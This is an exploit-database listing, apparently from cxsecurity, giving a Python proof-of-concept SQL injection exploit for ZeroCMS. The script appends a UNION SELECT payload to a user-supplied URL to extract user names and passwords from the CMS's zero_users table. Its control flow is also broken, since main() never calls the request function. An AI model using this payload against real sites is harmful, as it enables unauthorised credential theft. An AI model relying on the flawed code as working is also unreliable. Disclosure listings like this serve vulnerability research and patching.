ZeroCMS Exploit For SQL Injection

2014.06.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/python print ''' -- Poc for Zero CMS SQL Injection -- -- Author: Muhammad Adeel -- -- Blog: http://urdusecurity.blogspot.com -- ''' import urllib2 host = raw_input('Enter Site[http://spmesite.com/page.php?id=1337]: ') base_host = "+union+all+select+(select+concat(unhex(hex(cast(zero_users.name+as+char))),0x20,0x7c,0x20,unhex(hex(cast(zero_users.password+as+char))))+from+`zcdb`.zero_users+limit0,1),2,3,4,5,6--" url = host+base_host def poc(): request = urllib2.urlopen(url) print request.read() def main(): if __name__ == '__main__': main()

References:

http://urdusecurity.blogspot.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top